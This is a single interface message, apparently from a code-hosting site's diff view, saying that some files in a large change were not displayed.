Some files were not shown because too many files have changed in this diff.